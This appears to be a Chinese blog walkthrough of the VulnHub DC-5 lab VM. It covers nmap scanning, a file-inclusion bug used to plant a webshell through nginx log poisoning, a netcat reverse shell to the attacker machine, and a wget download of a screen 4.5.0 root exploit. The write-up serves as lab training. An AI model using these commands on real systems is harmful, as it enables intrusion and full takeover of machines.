1.环境搭建
靶机下载地址:DC: 5 ~ VulnHub
将下载好的虚拟机导入Oracle VM VirtualBox中,网络使用仅主机模式,网卡使用和kali相同的网卡
开启虚拟机
2.渗透过程
使用nmap工具进行主机发现扫描
nmap -sn 192.168.56.0/24
发现主机IP地址,使用nmap工具扫描端口
nmap -sS 192.168.56.117 -p-
发现开着80端口,111端口,36897端口,使用浏览器访问靶机80端口
http://192.168.56.117
点击contact
发现一个留言板,测试一下xxs失败,提交发现一个页面
使用dirb扫描一下目录
dirbuster
发现有一个footer.php,访问一下
发现每次访问数值会变,想到提交页面中也有一个相同的字符串
每次提交字符串也会变,猜测是一个文件包含,尝试一下file
使用burp抓包
成功,这里传入一句话木马,要使用burp传木马,反正浏览器进行url编码
查看一下nginx的日志
发现这是一个报错的日志,查看一下nginx的报错日志
发现一句话木马,使用蚁剑连接
kali中开启监听端口
nc -lvp 6666
连接成功使用反弹shell
nc 192.168.56.101 6666 -e /bin/bash
反弹成功,切换交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
这里使用suid提取
find / -perm -u=s -type 2>/dev/null
发现screen,搜索screen的提权洞
searchsploit screen 4.5.0
使用41154.sh文件
searchsploit -m 41154.sh 41154.sh
开启临时http服务
python3 -m http.server 8000
使用wget工具下载提取脚本
wget http://192.168.56.101:8000/41154.sh
失败,因为该目录没有权限,切换/tmp目录,在进行下载
cd /tmp
wget http://192.168.56.101:8000/41154.sh
赋给脚本权限,执行脚本
查看root下的文件
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
